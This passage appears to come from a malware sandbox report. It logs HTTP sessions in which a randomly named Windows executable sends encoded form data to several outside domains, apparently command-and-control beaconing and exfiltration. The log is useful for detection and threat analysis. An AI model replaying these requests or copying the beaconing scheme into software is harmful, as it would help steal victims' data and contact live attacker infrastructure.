Data Raw: 70 72 75 74 66 52 5f 50 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 51 5a 6f 6c 4e 77 4c 4f 61 2b 75 72 43 7a 4f 38 6a 70 65 37 6a 78 78 30 69 34 66 6e 75 43 53 76 56 73 75 48 56 49 3d
Data Ascii: prutfR_P=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uQZolNwLOa+urCzO8jpe7jxx0i4fnuCSvVsuHVI=
Sep 16, 2024 09:38:24.846539974 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Mon, 16 Sep 2024 07:38:24 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.masteriocp.online/p5rq/
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49714 | 13.228.81.39 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:38:26.469443083 CEST | 817 | OUT | POST /p5rq/ HTTP/1.1
Host: www.masteriocp.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.masteriocp.online
Referer: http://www.masteriocp.online/p5rq/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 70 72 75 74 66 52 5f 50 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 6c 33 76 61 38 74 69 75 75 61 74 68 4a 79 67 67 52 48 76 72 4a 6f 7a 47 6d 45 4d 50 57 55 54 66 4e 6e 78 59 61 2f 64 70 63 35 55 57 30 59 51 53 46 35 4c 76 64 2b 76 38 4e 6b 6d 48 49 33 4f 45 6c 32 48 36 75 54 75 5a 64 71 75 46 53 6e 6d 6c 46 56 2f 4a 2b 61 73 5a 71 64 54 74 49 6b 66 76 5a 38 61 34 47 6e 2f 71 47 42 62 38 73 50 33 4d 31 48 4f 6c 32 67 32 78 56 2b 34 76 70 63 5a 39 61 58 6a 55 65 6b 6d 42 68 32 6f 44 64 4a 6b 78 77 6f 32 65 6a 37 31 32 38 65 5a 43 65 5a 31 4b 36 79 34 35 71 59 75 64 30 73 54 77 49 76 39 35 6f 4e
Data Ascii: prutfR_P=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHl3va8tiuuathJyggRHvrJozGmEMPWUTfNnxYa/dpc5UW0YQSF5Lvd+v8NkmHI3OEl2H6uTuZdquFSnmlFV/J+asZqdTtIkfvZ8a4Gn/qGBb8sP3M1HOl2g2xV+4vpcZ9aXjUekmBh2oDdJkxwo2ej7128eZCeZ1K6y45qYud0sTwIv95oN
Sep 16, 2024 09:38:27.367500067 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Mon, 16 Sep 2024 07:38:27 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.masteriocp.online/p5rq/
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49715 | 13.228.81.39 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:38:29.012908936 CEST | 1834 | OUT | POST /p5rq/ HTTP/1.1
Host: www.masteriocp.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 1245
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.masteriocp.online
Referer: http://www.masteriocp.online/p5rq/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 70 72 75 74 66 52 5f 50 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 74 33 76 73 6f 74 77 5a 61 61 2f 78 4a 79 74 41 52 43 76 72 49 36 7a 48 4f 36 4d 50 4c 6a 54 63 31 6e 7a 36 69 2f 59 63 6f 35 44 47 30 59 50 43 46 34 45 50 64 72 76 39 68 37 6d 48 59 33 4f 45 6c 32 48 37 65 54 6e 74 42 71 69 6c 53 6b 79 31 46 6a 37 4a 2b 79 73 5a 7a 6f 54 74 45 30 66 38 52 38 61 59 57 6e 39 59 2b 42 58 38 73 33 77 4d 30 43 4f 6c 36 46 32 78 4a 79 34 75 4e 36 5a 37 71 58 31 77 7a 74 69 69 4a 68 2f 69 6c 6f 70 51 6b 61 6d 49 6a 56 79 30 38 51 44 51 4b 44 35 4f 79 75 37 38 2b 59 74 4f 42 59 4e 48 77 33 30 65 41 41 72 74 38 51 35 58 66 2b 7a 47 31 6e 77 48 5a 43 62 52 63 34 32 35 52 41 71 62 59 74 56 36 69 63 7a 6b 68 32 4c 4f 56 6a 75 62 66 37 69 31 43 38 46 4d 52 34 66 48 32 56 58 44 79 33 35 70 43 42 2b 4d 61 68 5a 75 78 4b 6c 49 43 6d 58 63 66 6c 44 30 43 37 78 47 34 37 53 62 38 42 61 78 35 45 50 67 39 55 39 43 6f 63 67 53 6f 33 73 [TRUNCATED]
Data Ascii: prutfR_P=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 [TRUNCATED]
Sep 16, 2024 09:38:29.944726944 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Mon, 16 Sep 2024 07:38:29 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.masteriocp.online/p5rq/
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49716 | 13.228.81.39 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:38:31.559880018 CEST | 529 | OUT | GET /p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux6 HTTP/1.1
Host: www.masteriocp.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 16, 2024 09:38:32.474405050 CEST | 524 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Mon, 16 Sep 2024 07:38:32 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux6
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49717 | 66.81.203.200 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:38:37.754627943 CEST | 785 | OUT | POST /osde/ HTTP/1.1
Host: www.mediaplug.biz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.mediaplug.biz
Referer: http://www.mediaplug.biz/osde/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 70 72 75 74 66 52 5f 50 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 73 72 49 58 4a 63 53 63 6b 68 56 48 75 4f 74 6e 34 44 77 38 33 36 4f 79 4a 38 70 5a 6e 39 65 57 7a 70 54 2f 65 35 41 39 78 6e 46 30 50 56 66 56 51 47 62 39 45 45 6c 49 50 66 6c 5a 5a 48 68 63 7a 34 4c 4c 35 63 70 62 49 47 47 63 45 69 6a 37 6b 41 46 46 52 49 55 32 76 43 33 48 77 6b 42 43 6d 38 72 6d 34 48 76 47 37 4e 2f 51 30 61 4d 68 67 38 62 30 72 6b 58 63 66 41 43 41 78 6c 61 4d 72 32 64 63 7a 54 5a 4b 37 72 46 47 64 6c 38 4f 51 35 66 6a 4f 6b 62 62 76 5a 44 37 4a 30 4a 6d 45 4b 54 59 66 61 58 44 50 66 62 36 66 6c 58 36 59 67 70 61 4e 76 75 76 41 63 67 3d
Data Ascii: prutfR_P=cUZt2z1pvMaysrIXJcSckhVHuOtn4Dw836OyJ8pZn9eWzpT/e5A9xnF0PVfVQGb9EElIPflZZHhcz4LL5cpbIGGcEij7kAFFRIU2vC3HwkBCm8rm4HvG7N/Q0aMhg8b0rkXcfACAxlaMr2dczTZK7rFGdl8OQ5fjOkbbvZD7J0JmEKTYfaXDPfb6flX6YgpaNvuvAcg=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49718 | 66.81.203.200 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:38:40.295301914 CEST | 805 | OUT | POST /osde/ HTTP/1.1
Host: www.mediaplug.biz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.mediaplug.biz
Referer: http://www.mediaplug.biz/osde/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 70 72 75 74 66 52 5f 50 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 32 57 7a 4d 76 2f 4d 6f 41 39 79 6e 46 30 58 6c 66 55 50 57 62 32 45 45 6f 31 50 65 5a 5a 5a 48 64 63 7a 38 50 4c 34 76 42 45 49 57 47 53 49 43 6a 35 71 67 46 46 52 49 55 32 76 42 4b 69 77 6b 5a 43 6d 76 7a 6d 71 54 37 42 6c 64 2f 52 38 36 4d 68 6b 38 62 4b 72 6b 57 78 66 43 32 2b 78 6e 79 4d 72 79 52 63 77 43 5a 4a 67 37 46 49 54 46 38 51 63 38 36 63 57 46 7a 42 6b 4b 6d 45 65 6d 63 63 4d 63 2b 79 46 34 66 72 63 2f 33 43 50 32 66 4e 4a 51 49 7a 58 4d 2b 66 65 4c 31 4a 6f 4e 66 41 6e 61 65 70 49 65 75 78 64 66 46 65 51 53 71 57
Data Ascii: prutfR_P=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL2WzMv/MoA9ynF0XlfUPWb2EEo1PeZZZHdcz8PL4vBEIWGSICj5qgFFRIU2vBKiwkZCmvzmqT7Bld/R86Mhk8bKrkWxfC2+xnyMryRcwCZJg7FITF8Qc86cWFzBkKmEemccMc+yF4frc/3CP2fNJQIzXM+feL1JoNfAnaepIeuxdfFeQSqW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49719 | 66.81.203.200 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:38:42.844691992 CEST | 1822 | OUT | POST /osde/ HTTP/1.1
Host: www.mediaplug.biz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 1245
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.mediaplug.biz
Referer: http://www.mediaplug.biz/osde/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 70 72 75 74 66 52 5f 50 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 2b 57 7a 36 37 2f 65 66 38 39 7a 6e 46 30 61 46 66 4a 50 57 62 72 45 48 59 78 50 65 55 73 5a 42 5a 63 68 4a 62 4c 78 2b 42 45 47 57 47 53 47 53 6a 34 6b 41 46 71 52 49 45 79 76 43 79 69 77 6b 5a 43 6d 74 48 6d 36 33 76 42 6e 64 2f 51 30 61 4d 74 67 38 61 6e 72 6b 4f 50 66 43 6a 4c 77 58 53 4d 71 57 39 63 32 77 78 4a 73 37 46 64 55 46 39 44 63 38 2b 39 57 46 2f 4e 6b 4c 53 2b 65 6b 4d 63 63 61 48 4e 42 4c 50 6e 4b 75 48 42 4a 56 72 2b 51 56 34 71 4a 75 43 51 62 4a 39 49 33 70 57 6f 6c 74 43 72 42 4f 62 76 4c 5a 6c 50 51 58 4c 32 56 63 5a 6b 4a 4c 61 59 64 34 32 39 65 44 7a 79 74 44 77 34 67 39 34 73 66 70 48 36 64 63 77 39 36 53 5a 74 37 55 71 4c 48 49 2b 43 57 6c 67 58 33 45 4b 50 5a 72 76 67 43 76 32 39 50 54 4a 72 4c 57 58 4d 66 46 38 2b 66 65 50 51 48 6b 50 6e 6c 49 49 38 72 69 72 44 41 54 4e 66 30 4b 57 45 49 6d 39 6a 4d 4d 43 54 61 56 5a 39 66 [TRUNCATED]
Data Ascii: prutfR_P=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL+Wz67/ef89znF0aFfJPWbrEHYxPeUsZBZchJbLx+BEGWGSGSj4kAFqRIEyvCyiwkZCmtHm63vBnd/Q0aMtg8anrkOPfCjLwXSMqW9c2wxJs7FdUF9Dc8+9WF/NkLS+ekMccaHNBLPnKuHBJVr+QV4qJuCQbJ9I3pWoltCrBObvLZlPQXL2VcZkJLaYd429eDzytDw4g94sfpH6dcw96SZt7UqLHI+CWlgX3EKPZrvgCv29PTJrLWXMfF8+fePQHkPnlII8rirDATNf0KWEIm9jMMCTaVZ9ftxSLcr/PA+SyNPMdxXcyOWIWkl0LMTywG70qE4p8S297URBHk7zAb0IuDuDHGknf2yMyxc8ycB09e9PMAmWAwFiBiFMJ8w3DaRE7uiYeR4MwQGRD86b8qGEzh7EYe7/f6WwHbJCnTHTKZ7nHx+l/EIJUrnPI08IFeXyYW4/XGuJyneqvu4bebEAb/v1r+dCg0v347sW6PLYFr5F6D75Ms693lfXxjMv//ZlNocxCy7PZcF/coXiinxjUjc1UOOJQveYQP78Pab7fKLy+/QBlJsDPxMv5RK0x8fgiy6OPKjIb8YHz0J1irJXqgtl+LfGTCc2e76iqb8xODxtyCp3jKpbLHmuzpYDR52k71fjqkQQSmiU0RnWzVkKvtpzdPIze4JxdypMOVbva/CqQoadE/L11GTPOd+TJlVoaWkR5WhzbRssqYq3akqXDqONbZ/6TD0NUM8fOi/itOqY0TJluL5kRsP5lPaJDnuSPY/XM7kvHBcn0dDcyHg8UtfwC7eLhLPdRpPXa7gfhix58tWC/FClmnwG8FYEdPkjINmoaFneCRyryQa8DqhkBJzw3uKtIYMGAxlpwnQPbn0e8xw+D3Ci/dn9/q1p/UEc3ZozvMhDmoVMyGiVSNpL933P+uObzvk2ehPOmqphPyjGy9zuNyT61+5FgheLqgD [TRUNCATED]


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  8           192.168.2.5  49720        66.81.203.200   80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:38:45.387876987 CEST  525                OUT        GET /osde/?prutfR_P=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.mediaplug.biz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  9           192.168.2.5  49721        103.42.108.46   80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:12.218713045 CEST  800                OUT        POST /yl6y/ HTTP/1.1
                                                  Host: www.independent200.org
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.independent200.org
                                                  Referer: http://www.independent200.org/yl6y/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 34 2b 61 4e 46 42 6d 66 4b 2f 77 73 66 62 72 45 4d 38 41 4a 76 30 70 39 6b 2b 66 65 38 64 6e 33 5a 4e 37 68 54 64 52 43 61 73 31 33 57 4f 43 42 61 42 54 45 64 66 4d 44 65 59 41 4e 48 6e 56 39 76 6f 76 30 4a 70 42 4f 41 79 56 56 54 50 54 38 48 69 55 75 65 56 39 6f 56 32 44 50 51 50 6b 73 70 2b 30 47 44 72 66 63 61 54 56 4b 45 79 58 58 51 56 43 6b 67 77 71 6f 61 66 78 4e 6f 52 78 4c 57 54 6f 61 78 75 63 56 74 41 49 43 63 70 57 68 42 41 69 35 59 71 34 53 38 2b 41 64 78 55 6a 2f 41 53 2b 76 62 69 32 6d 50 78 53 34 6a 4b 64 34 47 48 54 55 36 32 75 6e 66 34 34 3d
                                                  Data Ascii: prutfR_P=dNiLasFHVsc44+aNFBmfK/wsfbrEM8AJv0p9k+fe8dn3ZN7hTdRCas13WOCBaBTEdfMDeYANHnV9vov0JpBOAyVVTPT8HiUueV9oV2DPQPksp+0GDrfcaTVKEyXXQVCkgwqoafxNoRxLWToaxucVtAICcpWhBAi5Yq4S8+AdxUj/AS+vbi2mPxS4jKd4GHTU62unf44=
                                                  Sep 16, 2024 09:39:13.080423117 CEST  154                IN         HTTP/1.1 403 Forbidden
                                                  Content-Type: text/plain; charset=utf-8
                                                  Date: Mon, 16 Sep 2024 07:39:12 GMT
                                                  Content-Length: 11
                                                  Connection: close
                                                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                  Data Ascii: Bad Request


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  10          192.168.2.5  49722        103.42.108.46   80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:14.769258976 CEST  820                OUT        POST /yl6y/ HTTP/1.1
                                                  Host: www.independent200.org
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.independent200.org
                                                  Referer: http://www.independent200.org/yl6y/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 7a 33 5a 6f 2f 68 53 63 52 43 64 73 31 33 5a 75 44 4c 45 78 53 70 64 65 77 68 65 5a 4d 4e 48 6e 42 39 76 71 6e 30 4a 65 39 42 53 53 56 54 50 50 54 2b 59 79 55 75 65 56 39 6f 56 32 58 6c 51 50 73 73 70 4f 6b 47 43 50 72 44 5a 54 56 4a 54 43 58 58 62 31 43 67 67 77 72 39 61 65 39 6e 6f 53 4a 4c 57 53 30 61 78 36 49 4b 32 77 49 45 53 4a 58 4e 41 6a 62 69 63 62 38 64 77 2f 68 44 6c 54 48 36 4d 45 54 46 42 41 2b 4f 63 52 2b 41 7a 5a 56 50 58 33 79 39 67 56 2b 58 42 76 74 36 67 4e 41 58 66 53 4e 30 2b 32 64 69 49 62 4f 4c 6b 32 59 6b
                                                  Data Ascii: prutfR_P=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vz3Zo/hScRCds13ZuDLExSpdewheZMNHnB9vqn0Je9BSSVTPPT+YyUueV9oV2XlQPsspOkGCPrDZTVJTCXXb1Cggwr9ae9noSJLWS0ax6IK2wIESJXNAjbicb8dw/hDlTH6METFBA+OcR+AzZVPX3y9gV+XBvt6gNAXfSN0+2diIbOLk2Yk
                                                  Sep 16, 2024 09:39:15.619581938 CEST  154                IN         HTTP/1.1 403 Forbidden
                                                  Content-Type: text/plain; charset=utf-8
                                                  Date: Mon, 16 Sep 2024 07:39:15 GMT
                                                  Content-Length: 11
                                                  Connection: close
                                                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                  Data Ascii: Bad Request


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  11          192.168.2.5  49723        103.42.108.46   80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:17.311908960 CEST  1837               OUT        POST /yl6y/ HTTP/1.1
                                                  Host: www.independent200.org
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
